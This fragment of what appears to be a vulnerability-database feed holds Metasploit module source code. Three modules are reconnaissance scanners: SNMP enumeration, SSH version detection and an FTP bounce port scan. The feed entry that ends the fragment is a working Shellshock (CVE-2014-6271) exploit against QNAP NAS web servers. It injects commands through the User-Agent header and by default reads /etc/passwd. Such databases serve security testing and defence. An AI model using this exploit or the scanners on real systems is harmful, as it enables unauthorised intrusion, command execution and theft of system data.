\"ds3\"\n when 31\n iftype = \"sip\"\n when 32\n iftype = \"frame-relay\"\n else\n iftype = \"unknown\"\n end\n\n case ifstatus\n when 1\n ifstatus = \"up\"\n when 2\n ifstatus = \"down\"\n when 3\n ifstatus = \"testing\"\n else\n ifstatus = \"unknown\"\n end\n\n ifspeed = ifspeed / 1000000\n\n network_interfaces.push({\n \"Interface\" => \"[ #{ifstatus} ] #{ifdescr}\",\n \"Id\" => ifindex,\n \"Mac Address\" => ifmac,\n \"Type\" => iftype,\n \"Speed\" => \"#{ifspeed} Mbps\",\n \"MTU\" => ifmtu,\n \"In octets\" => ifinoc,\n \"Out octets\" => ifoutoc\n })\n end\n\n if not network_interfaces.empty?\n output_data[\"Network interfaces\"] = network_interfaces\n end\n\n network_ip = []\n\n snmp.walk([\n \"1.3.6.1.2.1.4.20.1.2\", \"1.3.6.1.2.1.4.20.1.1\",\n \"1.3.6.1.2.1.4.20.1.3\", \"1.3.6.1.2.1.4.20.1.4\"\n ]) do |ifid,ipaddr,netmask,bcast|\n network_ip.push([ifid.value, ipaddr.value, netmask.value, bcast.value])\n end\n\n if not network_ip.empty?\n output_data[\"Network IP\"] = [[\"Id\",\"IP Address\",\"Netmask\",\"Broadcast\"]] + network_ip\n end\n\n routing = []\n\n snmp.walk([\n \"1.3.6.1.2.1.4.21.1.1\", \"1.3.6.1.2.1.4.21.1.7\",\n \"1.3.6.1.2.1.4.21.1.11\",\"1.3.6.1.2.1.4.21.1.3\"\n ]) do |dest,hop,mask,metric|\n if (metric.value.to_s.empty?)\n metric.value = '-'\n end\n routing.push([dest.value, hop.value, mask.value, metric.value])\n end\n\n if not routing.empty?\n output_data[\"Routing information\"] = [[\"Destination\",\"Next hop\",\"Mask\",\"Metric\"]] + routing\n end\n\n tcp = []\n\n snmp.walk([\n \"1.3.6.1.2.1.6.13.1.2\",\"1.3.6.1.2.1.6.13.1.3\",\"1.3.6.1.2.1.6.13.1.4\",\n \"1.3.6.1.2.1.6.13.1.5\",\"1.3.6.1.2.1.6.13.1.1\"\n ]) do |ladd,lport,radd,rport,state|\n\n if (ladd.value.to_s.empty? or ladd.value.to_s =~ /noSuchInstance/)\n ladd = \"-\"\n else\n ladd = ladd.value\n end\n\n if (lport.value.to_s.empty? or lport.value.to_s =~ /noSuchInstance/)\n lport = \"-\"\n else\n lport = lport.value\n end\n\n if (radd.value.to_s.empty? or radd.value.to_s =~ /noSuchInstance/)\n radd = \"-\"\n else\n radd = radd.value\n end\n\n if (rport.value.to_s.empty? or rport.value.to_s =~ /noSuchInstance/)\n rport = \"-\"\n else\n rport = rport.value\n end\n\n case state.value\n when 1\n state = \"closed\"\n when 2\n state = \"listen\"\n when 3\n state = \"synSent\"\n when 4\n state = \"synReceived\"\n when 5\n state = \"established\"\n when 6\n state = \"finWait1\"\n when 7\n state = \"finWait2\"\n when 8\n state = \"closeWait\"\n when 9\n state = \"lastAck\"\n when 10\n state = \"closing\"\n when 11\n state = \"timeWait\"\n when 12\n state = \"deleteTCB\"\n else\n state = \"unknown\"\n end\n\n tcp.push([ladd, lport, radd, rport, state])\n end\n\n if not tcp.empty?\n output_data[\"TCP connections and listening ports\"] = [[\"Local address\",\"Local port\",\"Remote address\",\"Remote port\",\"State\"]] + tcp\n end\n\n udp = []\n\n snmp.walk([\"1.3.6.1.2.1.7.5.1.1\",\"1.3.6.1.2.1.7.5.1.2\"]) do |ladd,lport|\n udp.push([ladd.value, lport.value])\n end\n\n if not udp.empty?\n output_data[\"Listening UDP ports\"] = [[\"Local address\",\"Local port\"]] + udp\n end\n\n if (sysDesc =~ /Windows/)\n network_services = []\n n = 0\n snmp.walk([\"1.3.6.1.4.1.77.1.2.3.1.1\",\"1.3.6.1.4.1.77.1.2.3.1.2\"]) do |name,installed|\n network_services.push([n,name.value])\n n+=1\n end\n\n if not network_services.empty?\n output_data[\"Network services\"] = [[\"Index\",\"Name\"]] + network_services\n end\n\n share = []\n\n snmp.walk([\n \"1.3.6.1.4.1.77.1.2.27.1.1\",\"1.3.6.1.4.1.77.1.2.27.1.2\",\"1.3.6.1.4.1.77.1.2.27.1.3\"\n ]) do |name,path,comment|\n share.push({\" Name\"=>name.value, \" Path\"=>path.value, \" Comment\"=>comment.value})\n end\n\n if not share.empty?\n output_data[\"Share\"] = share\n end\n\n iis = {}\n\n http_totalBytesSentLowWord = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.2.0')\n if http_totalBytesSentLowWord.to_s !~ /Null/\n iis[\"TotalBytesSentLowWord\"] = http_totalBytesSentLowWord\n end\n\n http_totalBytesReceivedLowWord = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.4.0')\n if http_totalBytesReceivedLowWord.to_s !~ /Null/\n iis[\"TotalBytesReceivedLowWord\"] = http_totalBytesReceivedLowWord\n end\n\n http_totalFilesSent = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.5.0')\n if http_totalFilesSent.to_s !~ /Null/\n iis[\"TotalFilesSent\"] = http_totalFilesSent\n end\n\n http_currentAnonymousUsers = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.6.0')\n if http_currentAnonymousUsers.to_s !~ /Null/\n iis[\"CurrentAnonymousUsers\"] = http_currentAnonymousUsers\n end\n\n http_currentNonAnonymousUsers = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.7.0')\n if http_currentNonAnonymousUsers.to_s !~ /Null/\n iis[\"CurrentNonAnonymousUsers\"] = http_currentNonAnonymousUsers\n end\n\n http_totalAnonymousUsers = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.8.0')\n if http_totalAnonymousUsers.to_s !~ /Null/\n iis[\"TotalAnonymousUsers\"] = http_totalAnonymousUsers\n end\n\n http_totalNonAnonymousUsers = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.9.0')\n if http_totalNonAnonymousUsers.to_s !~ /Null/\n iis[\"TotalNonAnonymousUsers\"] = http_totalNonAnonymousUsers\n end\n\n http_maxAnonymousUsers = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.10.0')\n if http_maxAnonymousUsers.to_s !~ /Null/\n iis[\"MaxAnonymousUsers\"] = http_maxAnonymousUsers\n end\n\n http_maxNonAnonymousUsers = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.11.0')\n if http_maxNonAnonymousUsers.to_s !~ /Null/\n iis[\"MaxNonAnonymousUsers\"] = http_maxNonAnonymousUsers\n end\n\n http_currentConnections = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.12.0')\n if http_currentConnections.to_s !~ /Null/\n iis[\"CurrentConnections\"] = http_currentConnections\n end\n\n http_maxConnections = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.13.0')\n if http_maxConnections.to_s !~ /Null/\n iis[\"MaxConnections\"] = http_maxConnections\n end\n\n http_connectionAttempts = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.14.0')\n if http_connectionAttempts.to_s !~ /Null/\n iis[\"ConnectionAttempts\"] = http_connectionAttempts\n end\n\n http_logonAttempts = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.15.0')\n if http_logonAttempts.to_s !~ /Null/\n iis[\"LogonAttempts\"] = http_logonAttempts\n end\n\n http_totalGets = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.16.0')\n if http_totalGets.to_s !~ /Null/\n iis[\"Gets\"] = http_totalGets\n end\n\n http_totalPosts = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.17.0')\n if http_totalPosts.to_s !~ /Null/\n iis[\"Posts\"] = http_totalPosts\n end\n\n http_totalHeads = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.18.0')\n if http_totalHeads.to_s !~ /Null/\n iis[\"Heads\"] = http_totalHeads\n end\n\n http_totalOthers = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.19.0')\n if http_totalOthers.to_s !~ /Null/\n iis[\"Others\"] = http_totalOthers\n end\n\n http_totalCGIRequests = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.20.0')\n if http_totalCGIRequests.to_s !~ /Null/\n iis[\"CGIRequests\"] = http_totalCGIRequests\n end\n\n http_totalBGIRequests = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.21.0')\n if http_totalBGIRequests.to_s !~ /Null/\n iis[\"BGIRequests\"] = http_totalBGIRequests\n end\n\n http_totalNotFoundErrors = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.22.0')\n if http_totalNotFoundErrors.to_s !~ /Null/\n iis[\"NotFoundErrors\"] = http_totalNotFoundErrors\n end\n\n if not iis.empty?\n output_data[\"IIS server information\"] = iis\n end\n end\n\n storage_information = []\n\n snmp.walk([\n \"1.3.6.1.2.1.25.2.3.1.1\", \"1.3.6.1.2.1.25.2.3.1.2\", \"1.3.6.1.2.1.25.2.3.1.3\",\n \"1.3.6.1.2.1.25.2.3.1.4\", \"1.3.6.1.2.1.25.2.3.1.5\", \"1.3.6.1.2.1.25.2.3.1.6\"\n ]) do |index,type,descr,allocation,size,used|\n\n case type.value.to_s\n when /^1.3.6.1.2.1.25.2.1.1$/\n type.value = \"Other\"\n when /^1.3.6.1.2.1.25.2.1.2$/\n type.value = \"Ram\"\n when /^1.3.6.1.2.1.25.2.1.3$/\n type.value = \"Virtual Memory\"\n when /^1.3.6.1.2.1.25.2.1.4$/\n type.value = \"Fixed Disk\"\n when /^1.3.6.1.2.1.25.2.1.5$/\n type.value = \"Removable Disk\"\n when /^1.3.6.1.2.1.25.2.1.6$/\n type.value = \"Floppy Disk\"\n when /^1.3.6.1.2.1.25.2.1.7$/\n type.value = \"Compact Disc\"\n when /^1.3.6.1.2.1.25.2.1.8$/\n type.value = \"RamDisk\"\n when /^1.3.6.1.2.1.25.2.1.9$/\n type.value = \"Flash Memory\"\n when /^1.3.6.1.2.1.25.2.1.10$/\n type.value = \"Network Disk\"\n else\n type.value = \"unknown\"\n end\n\n allocation.value = \"unknown\" if allocation.value.to_s =~ /noSuchInstance/\n size.value = \"unknown\" if size.value.to_s =~ /noSuchInstance/\n used.value = \"unknown\" if used.value.to_s =~ /noSuchInstance/\n\n storage_information.push([[descr.value],[index.value],[type.value],[allocation.value],[size.value],[used.value]])\n end\n\n if not storage_information.empty?\n storage = []\n storage_information.each {|a,b,c,d,e,f|\n s = {}\n\n e = number_to_human_size(e,d)\n f = number_to_human_size(f,d)\n\n s[\"Description\"]= a\n s[\"Device id\"] = b\n s[\"Filesystem type\"] = c\n s[\"Device unit\"] = d\n s[\"Memory size\"] = e\n s[\"Memory used\"] = f\n\n storage.push(s)\n }\n output_data[\"Storage information\"] = storage\n end\n\n file_system = {}\n\n hrFSIndex = snmp.get_value('1.3.6.1.2.1.25.3.8.1.1.1')\n if hrFSIndex.to_s !~ /Null/\n file_system[\"Index\"] = hrFSIndex\n end\n\n hrFSMountPoint = snmp.get_value('1.3.6.1.2.1.25.3.8.1.2.1')\n if hrFSMountPoint.to_s !~ /Null/\n file_system[\"Mount point\"] = hrFSMountPoint\n end\n\n hrFSRemoteMountPoint = snmp.get_value('1.3.6.1.2.1.25.3.8.1.3.1')\n if hrFSRemoteMountPoint.to_s !~ /Null/ and hrFSRemoteMountPoint.to_s !~ /^noSuch/\n if hrFSRemoteMountPoint.empty?\n hrFSRemoteMountPoint = '-'\n end\n file_system[\"Remote mount point\"] = hrFSRemoteMountPoint\n end\n\n hrFSType = snmp.get_value('1.3.6.1.2.1.25.3.8.1.4.1')\n\n case hrFSType.to_s\n when /^1.3.6.1.2.1.25.3.9.1$/\n hrFSType = \"Other\"\n when /^1.3.6.1.2.1.25.3.9.2$/\n hrFSType = \"Unknown\"\n when /^1.3.6.1.2.1.25.3.9.3$/\n hrFSType = \"BerkeleyFFS\"\n when /^1.3.6.1.2.1.25.3.9.4$/\n hrFSType = \"Sys5FS\"\n when /^1.3.6.1.2.1.25.3.9.5$/\n hrFSType = \"Fat\"\n when /^1.3.6.1.2.1.25.3.9.6$/\n hrFSType = \"HPFS\"\n when /^1.3.6.1.2.1.25.3.9.7$/\n hrFSType = \"HFS\"\n when /^1.3.6.1.2.1.25.3.9.8$/\n hrFSType = \"MFS\"\n when /^1.3.6.1.2.1.25.3.9.9$/\n hrFSType = \"NTFS\"\n when /^1.3.6.1.2.1.25.3.9.10$/\n hrFSType = \"VNode\"\n when /^1.3.6.1.2.1.25.3.9.11$/\n hrFSType = \"Journaled\"\n when /^1.3.6.1.2.1.25.3.9.12$/\n hrFSType = \"iso9660\"\n when /^1.3.6.1.2.1.25.3.9.13$/\n hrFSType = \"RockRidge\"\n when /^1.3.6.1.2.1.25.3.9.14$/\n hrFSType = \"NFS\"\n when /^1.3.6.1.2.1.25.3.9.15$/\n hrFSType = \"Netware\"\n when /^1.3.6.1.2.1.25.3.9.16$/\n hrFSType = \"AFS\"\n when /^1.3.6.1.2.1.25.3.9.17$/\n hrFSType = \"DFS\"\n when /^1.3.6.1.2.1.25.3.9.18$/\n hrFSType = \"Appleshare\"\n when /^1.3.6.1.2.1.25.3.9.19$/\n hrFSType = \"RFS\"\n when /^1.3.6.1.2.1.25.3.9.20$/\n hrFSType = \"DGCFS\"\n when /^1.3.6.1.2.1.25.3.9.21$/\n hrFSType = \"BFS\"\n when /^1.3.6.1.2.1.25.3.9.22$/\n hrFSType = \"FAT32\"\n when /^1.3.6.1.2.1.25.3.9.23$/\n hrFSType = \"LinuxExt2\"\n else\n hrFSType = \"Null\"\n end\n\n if hrFSType.to_s !~ /Null/\n file_system[\"Type\"] = hrFSType\n end\n\n hrFSAccess = snmp.get_value('1.3.6.1.2.1.25.3.8.1.5.1')\n if hrFSAccess.to_s !~ /Null/\n file_system[\"Access\"] = hrFSAccess\n end\n\n hrFSBootable = snmp.get_value('1.3.6.1.2.1.25.3.8.1.6.1')\n if hrFSBootable.to_s !~ /Null/\n file_system[\"Bootable\"] = hrFSBootable\n end\n\n if not file_system.empty?\n output_data[\"File system information\"] = file_system\n end\n\n device_information = []\n\n snmp.walk([\n \"1.3.6.1.2.1.25.3.2.1.1\", \"1.3.6.1.2.1.25.3.2.1.2\",\n \"1.3.6.1.2.1.25.3.2.1.5\", \"1.3.6.1.2.1.25.3.2.1.3\"\n ]) do |index,type,status,descr|\n\n case type.value.to_s\n when /^1.3.6.1.2.1.25.3.1.1$/\n type.value = \"Other\"\n when /^1.3.6.1.2.1.25.3.1.2$/\n type.value = \"Unknown\"\n when /^1.3.6.1.2.1.25.3.1.3$/\n type.value = \"Processor\"\n when /^1.3.6.1.2.1.25.3.1.4$/\n type.value = \"Network\"\n when /^1.3.6.1.2.1.25.3.1.5$/\n type.value = \"Printer\"\n when /^1.3.6.1.2.1.25.3.1.6$/\n type.value = \"Disk Storage\"\n when /^1.3.6.1.2.1.25.3.1.10$/\n type.value = \"Video\"\n when /^1.3.6.1.2.1.25.3.1.11$/\n type.value = \"Audio\"\n when /^1.3.6.1.2.1.25.3.1.12$/\n type.value = \"Coprocessor\"\n when /^1.3.6.1.2.1.25.3.1.13$/\n type.value = \"Keyboard\"\n when /^1.3.6.1.2.1.25.3.1.14$/\n type.value = \"Modem\"\n when /^1.3.6.1.2.1.25.3.1.15$/\n type.value = \"Parallel Port\"\n when /^1.3.6.1.2.1.25.3.1.16$/\n type.value = \"Pointing\"\n when /^1.3.6.1.2.1.25.3.1.17$/\n type.value = \"Serial Port\"\n when /^1.3.6.1.2.1.25.3.1.18$/\n type.value = \"Tape\"\n when /^1.3.6.1.2.1.25.3.1.19$/\n type.value = \"Clock\"\n when /^1.3.6.1.2.1.25.3.1.20$/\n type.value = \"Volatile Memory\"\n when /^1.3.6.1.2.1.25.3.1.21$/\n type.value = \"Non Volatile Memory\"\n else\n type.value = \"unknown\"\n end\n\n case status.value\n when 1\n status.value = \"unknown\"\n when 2\n status.value = \"running\"\n when 3\n status.value = \"warning\"\n when 4\n status.value = \"testing\"\n when 5\n status.value = \"down\"\n else\n status.value = \"unknown\"\n end\n\n descr.value = \"unknown\" if descr.value.to_s =~ /noSuchInstance/\n\n device_information.push([index.value, type.value, status.value, descr.value])\n end\n\n if not device_information.empty?\n output_data[\"Device information\"] = [[\"Id\",\"Type\",\"Status\",\"Descr\"]] + device_information\n end\n\n software_list = []\n\n snmp.walk([\"1.3.6.1.2.1.25.6.3.1.1\",\"1.3.6.1.2.1.25.6.3.1.2\"]) do |index,name|\n software_list.push([index.value,name.value])\n end\n\n if not software_list.empty?\n output_data[\"Software components\"] = [[\"Index\",\"Name\"]] + software_list\n end\n\n process_interfaces = []\n\n snmp.walk([\n \"1.3.6.1.2.1.25.4.2.1.1\", \"1.3.6.1.2.1.25.4.2.1.2\", \"1.3.6.1.2.1.25.4.2.1.4\",\n \"1.3.6.1.2.1.25.4.2.1.5\", \"1.3.6.1.2.1.25.4.2.1.7\"\n ]) do |id,name,path,param,status|\n\n if status.value == 1\n status.value = \"running\"\n elsif status.value == 2\n status.value = \"runnable\"\n else\n status.value = \"unknown\"\n end\n\n process_interfaces.push([id.value, status.value, name.value, path.value, param.value])\n end\n\n if not process_interfaces.empty?\n output_data[\"Processes\"] = [[\"Id\",\"Status\",\"Name\",\"Path\",\"Parameters\"]] + process_interfaces\n end\n\n print_line(\"\\n[*] System information:\\n\")\n\n line = \"\"\n width = 30 # name field width\n twidth = 32 # table like display cell width\n\n fields_order.each {|k|\n if not output_data.has_key?(k)\n next\n end\n\n v = output_data[k]\n\n case v\n when Array\n content = \"\"\n\n v.each{ |a|\n case a\n when Hash\n a.each{ |sk, sv|\n sk = truncate_to_twidth(sk, twidth)\n content << sprintf(\"%s%s: %s\\n\", sk, \" \"*([0,width-sk.length].max), sv)\n }\n content << \"\\n\"\n when Array\n a.each { |sv|\n sv = sv.to_s.strip\n # I don't like cutting info\n #sv = truncate_to_twidth(sv, twidth)\n content << sprintf(\"%-20s\", sv)\n }\n content << \"\\n\"\n else\n content << sprintf(\" %s\\n\", a)\n content << \"\\n\"\n end\n }\n\n report_note(\n :host => ip,\n :proto => 'udp',\n :sname => 'snmp',\n :port => datastore['RPORT'].to_i,\n :type => \"snmp.#{k}\",\n :data => content\n )\n\n line << \"\\n[*] #{k}:\\n\\n#{content}\"\n\n when Hash\n content = \"\"\n v.each{ |sk, sv|\n sk = truncate_to_twidth(sk,twidth)\n content << sprintf(\"%s%s: %s\\n\", sk, \" \"*([0,width-sk.length].max), sv)\n }\n\n report_note(\n :host => ip,\n :proto => 'udp',\n :sname => 'snmp',\n :port => datastore['RPORT'].to_i,\n :type => \"snmp.#{k}\",\n :data => content\n )\n\n line << \"\\n[*] #{k}:\\n\\n#{content}\"\n content << \"\\n\"\n else\n if (v.nil? or v.empty? or v =~ /Null/)\n v = '-'\n end\n\n report_note(\n :host => ip,\n :proto => 'udp',\n :sname => 'snmp',\n :port => datastore['RPORT'].to_i,\n :type => \"snmp.#{k}\",\n :data => v\n )\n\n k = truncate_to_twidth(k,twidth)\n line << sprintf(\"%s%s: %s\\n\", k, \" \"*([0,width-k.length].max), v)\n end\n }\n\n print_line(line)\n print_line('')\n\n rescue SNMP::RequestTimeout\n print_error(\"#{ip} SNMP request timeout.\")\n rescue Rex::ConnectionError\n print_error(\"#{ip} Connection refused.\")\n rescue SNMP::InvalidIpAddress\n print_error(\"#{ip} Invalid IP Address. Check it with 'snmpwalk tool'.\")\n rescue SNMP::UnsupportedVersion\n print_error(\"#{ip} Unsupported SNMP version specified. Select from '1' or '2c'.\")\n rescue ::Interrupt\n raise $!\n rescue ::Exception => e\n print_error(\"Unknown error: #{e.class} #{e}\")\n elog(\"Unknown error: #{e.class} #{e}\")\n elog(\"Call stack:\\n#{e.backtrace.join \"\\n\"}\")\n ensure\n disconnect_snmp\n end\n end\n\n def truncate_to_twidth(string,twidth)\n string.slice(0..twidth-2)\n end\n\n def number_to_human_size(size,unit)\n size = size.first.to_i * unit.first.to_i\n\n if size < 1024\n \"#{size} bytes\"\n elsif size < 1024.0 * 1024.0\n \"%.02f KB\" % (size / 1024.0)\n elsif size < 1024.0 * 1024.0 * 1024.0\n \"%.02f MB\" % (size / 1024.0 / 1024.0)\n else\n \"%.02f GB\" % (size / 1024.0 / 1024.0 / 1024.0)\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/snmp/snmp_enum.rb"}, {"lastseen": "2019-05-01T00:33:42", "bulletinFamily": "exploit", "description": "Detect SSH Version.", "modified": "2017-07-24T13:26:21", "published": "2009-05-11T02:46:59", "id": "MSF:AUXILIARY/SCANNER/SSH/SSH_VERSION", "href": "", "type": "metasploit", "title": "SSH Version Scanner", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'recog'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Tcp\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::Report\n\n # the default timeout (in seconds) to wait, in total, for both a successful\n # connection to a given endpoint and for the initial protocol response\n # from the supposed SSH endpoint to be returned\n DEFAULT_TIMEOUT = 30\n\n def initialize\n super(\n 'Name' => 'SSH Version Scanner',\n 'Description' => 'Detect SSH Version.',\n 'References' =>\n [\n [ 'URL', 'http://en.wikipedia.org/wiki/SecureShell' ]\n ],\n 'Author' => [ 'Daniel van Eeden <metasploit[at]myname.nl>' ],\n 'License' => MSF_LICENSE\n )\n\n register_options(\n [\n Opt::RPORT(22),\n OptInt.new('TIMEOUT', [true, 'Timeout for the SSH probe', DEFAULT_TIMEOUT])\n ],\n self.class\n )\n end\n\n def timeout\n datastore['TIMEOUT'] <= 0 ? DEFAULT_TIMEOUT : datastore['TIMEOUT']\n end\n\n\n def run_host(target_host)\n begin\n ::Timeout.timeout(timeout) do\n connect\n\n resp = sock.get_once(-1, timeout)\n\n if ! resp\n vprint_warning(\"No response\")\n return\n end\n\n ident, first_message = resp.split(/[\\r\\n]+/)\n info = \"\"\n\n if /^SSH-\\d+\\.\\d+-(.*)$/ !~ ident\n vprint_warning(\"Was not SSH -- #{resp.size} bytes beginning with #{resp[0, 12]}\")\n return\n end\n\n banner = $1\n\n # Try to match with Recog and show the relevant fields to the user\n recog_match = Recog::Nizer.match('ssh.banner', banner)\n if recog_match\n info << \" ( \"\n recog_match.each_pair do |k,v|\n next if k == 'matched'\n info << \"#{k}=#{v} \"\n end\n info << \")\"\n end\n\n # Check to see if this is Kippo, which sends a premature\n # key init exchange right on top of the SSH version without\n # waiting for the required client identification string.\n if first_message && first_message.size >= 5\n extra = first_message.unpack(\"NCCA*\") # sz, pad_sz, code, data\n if (extra.last.size + 2 == extra[0]) && extra[2] == 20\n info << \" (Kippo Honeypot)\"\n end\n end\n\n print_good(\"SSH server version: #{ident}#{info}\")\n report_service(host: rhost, port: rport, name: 'ssh', proto: 'tcp', info: ident)\n end\n rescue Timeout::Error\n vprint_warning(\"Timed out after #{timeout} seconds. Skipping.\")\n ensure\n disconnect\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ssh/ssh_version.rb"}, {"lastseen": "2019-04-29T13:03:24", "bulletinFamily": "exploit", "description": "Enumerate TCP services via the FTP bounce PORT/LIST method.", "modified": "2019-03-05T09:38:51", "published": "2009-01-23T02:05:28", "id": "MSF:AUXILIARY/SCANNER/PORTSCAN/FTPBOUNCE", "href": "", "type": "metasploit", "title": "FTP Bounce Port Scanner", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n\n # Order is important here\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n include Msf::Exploit::Remote::Ftp\n\n def initialize\n super(\n 'Name' => 'FTP Bounce Port Scanner',\n 'Description' => %q{\n Enumerate TCP services via the FTP bounce PORT/LIST\n method.\n },\n 'Author' => 'kris katterjohn',\n 'License' => MSF_LICENSE\n )\n\n register_options([\n OptString.new('PORTS', [true, \"Ports to scan (e.g. 22-25,80,110-900)\", \"1-10000\"]),\n OptAddress.new('BOUNCEHOST', [true, \"FTP relay host\"]),\n OptPort.new('BOUNCEPORT', [true, \"FTP relay port\", 21]),\n OptInt.new('DELAY', [true, \"The delay between connections, per thread, in milliseconds\", 0]),\n OptInt.new('JITTER', [true, \"The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.\", 0])\n ])\n\n deregister_options('RPORT')\n end\n\n # No IPv6 support yet\n def support_ipv6?\n false\n end\n\n def rhost\n datastore['BOUNCEHOST']\n end\n\n def rport\n datastore['BOUNCEPORT']\n end\n\n def run_host(ip)\n ports = Rex::Socket.portspec_crack(datastore['PORTS'])\n if ports.empty?\n raise Msf::OptionValidateError.new(['PORTS'])\n end\n\n jitter_value = datastore['JITTER'].to_i\n if jitter_value < 0\n raise Msf::OptionValidateError.new(['JITTER'])\n end\n\n delay_value = datastore['DELAY'].to_i\n if delay_value < 0\n raise Msf::OptionValidateError.new(['DELAY'])\n end\n\n return if not connect_login\n\n ports.each do |port|\n # Clear out the receive buffer since we're heavily dependent\n # on the response codes. We need to do this between every\n # port scan attempt unfortunately.\n while true\n r = sock.get_once(-1, 0.25)\n break if not r or r.empty?\n end\n\n begin\n\n # Add the delay based on JITTER and DELAY if needs be\n add_delay_jitter(delay_value,jitter_value)\n\n host = (ip.split('.') + [port / 256, port % 256]).join(',')\n resp = send_cmd([\"PORT\", host])\n\n if resp =~ /^5/\n #print_error(\"Got error from PORT to #{ip}:#{port}\")\n next\n elsif not resp\n next\n end\n\n resp = send_cmd([\"LIST\"])\n\n if resp =~ /^[12]/\n print_good(\" TCP OPEN #{ip}:#{port}\")\n report_service(:host => ip, :port => port)\n end\n rescue ::Exception\n print_error(\"Unknown error: #{$!}\")\n end\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/portscan/ftpbounce.rb"}], "exploitdb": [{"lastseen": "2016-02-04T03:40:08", "bulletinFamily": "exploit", "description": "QNAP - Web Server Remote Code Execution via Bash Environment Variable Code Injection. CVE-2014-3659,CVE-2014-3671,CVE-2014-6271,CVE-2014-62771,CVE-2014-7169,...", "modified": "2015-03-26T00:00:00", "published": "2015-03-26T00:00:00", "id": "EDB-ID:36504", "href": "https://www.exploit-db.com/exploits/36504/", "type": "exploitdb", "title": "QNAP - Web Server Remote Code Execution via Bash Environment Variable Code Injection", "sourceData": "# Exploit Title: QNAP Web server remote code execution via Bash Environment Variable Code Injection\r\n# Date: 7 February 2015\r\n# Exploit Author: Patrick Pellegrino | 0x700x700x650x6c0x6c0x650x670x720x690x6e0x6f@securegroup.it [work] / 0x640x330x760x620x700x70@gmail.com [other]\r\n# Employer homepage: http://www.securegroup.it\r\n# Vendor homepage: http://www.qnap.com\r\n# Version: All Turbo NAS models except TS-100, TS-101, TS-200\r\n# Tested on: TS-1279U-RP\r\n# CVE : 2014-6271\r\n# Vendor URL bulletin : http://www.qnap.com/i/it/support/con_show.php?cid=61\r\n\r\n\r\n##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/d3vpp/metasploit-modules\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Auxiliary\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'QNAP Web server remote code execution via Bash Environment Variable Code Injection',\r\n 'Description' => %q{\r\n\t\tThis module allows you to inject unix command with the same user who runs the http service - admin - directly on the QNAP system.\r\n\t\tAffected products:\r\n\t\tAll Turbo NAS models except TS-100, TS-101, TS-200\r\n\t\t},\r\n 'Author' => ['Patrick Pellegrino'], # Metasploit module | 0x700x700x650x6c0x6c0x650x670x720x690x6e0x6f@securegroup.it [work] / 0x640x330x760x620x700x70@gmail.com [other]\r\n 'License' => MSF_LICENSE,\r\n 'References' => [\r\n\t\t\t['CVE', '2014-6271'], #aka ShellShock\r\n\t\t\t['URL', 'http://www.qnap.com/i/it/support/con_show.php?cid=61']\r\n\t\t],\r\n 'Platform' => ['unix']\r\n ))\r\n\r\n register_options([\r\n OptString.new('TARGETURI', [true, 'Path to CGI script','/cgi-bin/index.cgi']),\r\n OptString.new('CMD', [ true, 'The command to run', '/bin/cat /etc/passwd'])\r\n ], self.class)\r\n end\r\n\r\n def check\r\n\tbegin\r\n \tres = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri.path),\r\n 'agent' => \"() { :;}; echo; /usr/bin/id\"\r\n })\r\n\trescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE\r\n\t\tvprint_error(\"Connection failed\")\r\n\t\treturn Exploit::CheckCode::Unknown\r\n end\r\n\t\r\n if !res\r\n return Exploit::CheckCode::Unknown\r\n elsif res.code== 302 and res.body.include? 'uid'\r\n\t return Exploit::CheckCode::Vulnerable\r\n end\r\n return Exploit::CheckCode::Safe\r\n end\r\n\t\r\n\r\n def run\r\n\r\n\tres = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri.path),\r\n 'agent' => \"() { :;}; echo; #{datastore['CMD']}\"\r\n })\r\n\t\r\n\tif res.body.empty?\r\n\t\tprint_error(\"No data found.\")\r\n\telsif res.code== 302\r\n\t\tprint_status(\"#{rhost}:#{rport} - bash env variable injected\")\r\n\t\tputs \" \"\r\n\t\tprint_line(res.body)\r\n end\r\n\tend\r\n\t\r\nend\r\n", 